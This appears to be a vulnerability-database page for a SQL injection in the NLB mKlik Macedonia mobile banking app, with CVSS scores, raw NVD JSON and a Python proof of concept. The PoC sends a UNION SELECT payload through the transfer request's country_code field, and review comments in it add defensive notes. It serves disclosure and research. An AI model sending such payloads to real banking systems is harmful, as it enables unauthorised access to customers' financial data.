Security Vulnerability Report
CVE-2023-54163 CVSS 7.5 HIGH

CVE-2023-54163

Published: 2025-12-30 23:15:48
Last Modified: 2026-01-16 19:16:15

Description

NLB mKlik Macedonia 3.3.12 contains a SQL injection vulnerability in international transfer parameters that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through unsanitized input to potentially disclose sensitive information from the mobile banking application.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nlb:mklik_makedonija:3.3.12:*:*:*:*:android:*:* - VULNERABLE
NLB mKlik Macedonia < 3.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json  # NOTE(review): not referenced anywhere in this listing

# CVE-2023-54163 PoC - NLB mKlik Macedonia SQL Injection
# Target: International transfer parameters

# Example host only; the listing never points at a live system.
TARGET_URL = "https://example-nlb-bank.com/api/v1/international-transfer"


def exploit_sql_injection():
    """
    Send one international-transfer request whose ``country_code`` field
    carries a SQL fragment and print what the server answered
    (CVE-2023-54163).

    Takes no arguments and returns nothing. Its only observable effects are a
    single HTTP POST to ``TARGET_URL`` and the ``print`` output below;
    transport failures raised by ``requests`` are caught and printed rather
    than propagated.

    Defender notes:
      * The request is an ordinary JSON POST. The only anomaly is a SQL
        fragment inside a field that should hold a short, well-formed country
        identifier; strict input validation plus parameterised queries on the
        server remove this class of issue.
      * The "confirmed" branch below relies on database error text reaching
        the client. Returning a generic 500 body and logging the detail
        server-side removes that signal.
    """
    # Fragment placed in country_code; the original author's comment says it
    # is meant to pull back the database version string.
    malicious_payload = "' UNION SELECT NULL,@@version,NULL,NULL--"

    headers = {
        "Content-Type": "application/json",
        # Placeholder token. NOTE(review): this implies an authenticated
        # caller, whereas the advisory's CVSS vector rates PR:N — confirm
        # which precondition actually applies.
        "Authorization": "Bearer <valid_token>",
        # Mirrors the app's own UA string; User-Agent is client-controlled and
        # cannot serve as a server-side control.
        "User-Agent": "NLB-mKlik/3.3.12"
    }

    # Shape of an ordinary transfer request; every value other than
    # country_code is a dummy and none of the accounts are asserted to exist.
    data = {
        "sender_account": "1234567890",
        "receiver_name": "John Doe",
        "receiver_account": "GB82WEST12345698765432",
        "country_code": malicious_payload,  # Injection point
        "currency": "EUR",
        "amount": "1000.00",
        "swift_code": "NLBKMK2X"
    }

    try:
        # One POST; the timeout keeps the script from hanging on a silent host.
        response = requests.post(TARGET_URL, headers=headers, json=data, timeout=30)

        # Check for SQL error indicators in response.
        # Heuristic only: a 500 whose body mentions "sql" is treated as
        # confirmation (the "mysql" test is redundant, since "mysql" already
        # contains "sql"). From the server's side, driver error text in an
        # HTTP response is itself an information leak worth fixing on its own.
        if response.status_code == 500:
            if "sql" in response.text.lower() or "mysql" in response.text.lower():
                print("[+] SQL Injection vulnerability confirmed!")
                # Only the first 200 characters of the body are echoed.
                print(f"[+] Database error leaked: {response.text[:200]}")
        elif response.status_code == 200:
            # A 200 is not evidence by itself; the script just dumps the body.
            print("[*] Request processed, check for data exfiltration in response")
            # NOTE(review): .json() raises if the body is not JSON; whether the
            # except clause below catches that depends on the installed
            # requests version.
            print(f"[*] Response: {response.json()}")
    except requests.exceptions.RequestException as e:
        # Connection errors, timeouts and similar transport failures.
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-54163", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:48.337", "lastModified": "2026-01-16T19:16:14.840", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLB mKlik Macedonia 3.3.12 contains a SQL injection vulnerability in international transfer parameters that allows attackers to manipulate database queries. Attackers can inject arbitrary SQL code through unsanitized input to potentially disclose sensitive information from the mobile banking application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nlb:mklik_makedonija:3.3.12:*:*:*:*:android:*:*", "matchCriteriaId": "B9A230B7-BB90-4D31-9010-D5C8B24414EB"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2023100040", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/175113/NLB-mKlik-Makedonija-3.3.12-SQL-Injection.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.production", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://www.vulncheck.com/advisories/nlb-mklik-macedonia-sql-injection-via-international-transfer-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://cxsecurity.com/issue/WLB-2023100040", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}